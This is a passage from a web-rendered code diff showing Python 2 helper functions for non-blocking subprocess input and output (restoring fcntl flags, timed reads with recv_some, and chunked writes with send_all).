finally:
|
||||||
|
if not conn.closed:
|
||||||
|
fcntl.fcntl(conn, fcntl.F_SETFL, flags)
|
||||||
|
|
||||||
|
def recv_some(p, t=.1, e=1, tr=5, stderr=0):
|
||||||
|
if tr < 1:
|
||||||
|
tr = 1
|
||||||
|
x = time.time() + t
|
||||||
|
y = []
|
||||||
|
r = ''
|
||||||
|
if stderr:
|
||||||
|
pr = p.recv_err
|
||||||
|
else:
|
||||||
|
pr = p.recv
|
||||||
|
while time.time() < x or r:
|
||||||
|
r = pr()
|
||||||
|
if r is None:
|
||||||
|
break
|
||||||
|
elif r:
|
||||||
|
y.append(r)
|
||||||
|
else:
|
||||||
|
time.sleep(max((x - time.time()) / tr, 0))
|
||||||
|
return ''.join(y)
|
||||||
|
|
||||||
|
def send_all(p, data):
|
||||||
|
if not data:
|
||||||
|
return
|
||||||
|
|
||||||
|
while len(data):
|
||||||
|
sent = p.send(data)
|
||||||
|
if not isinstance(sent, int):
|
||||||
|
break
|
||||||
|
data = buffer(data, sent)
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user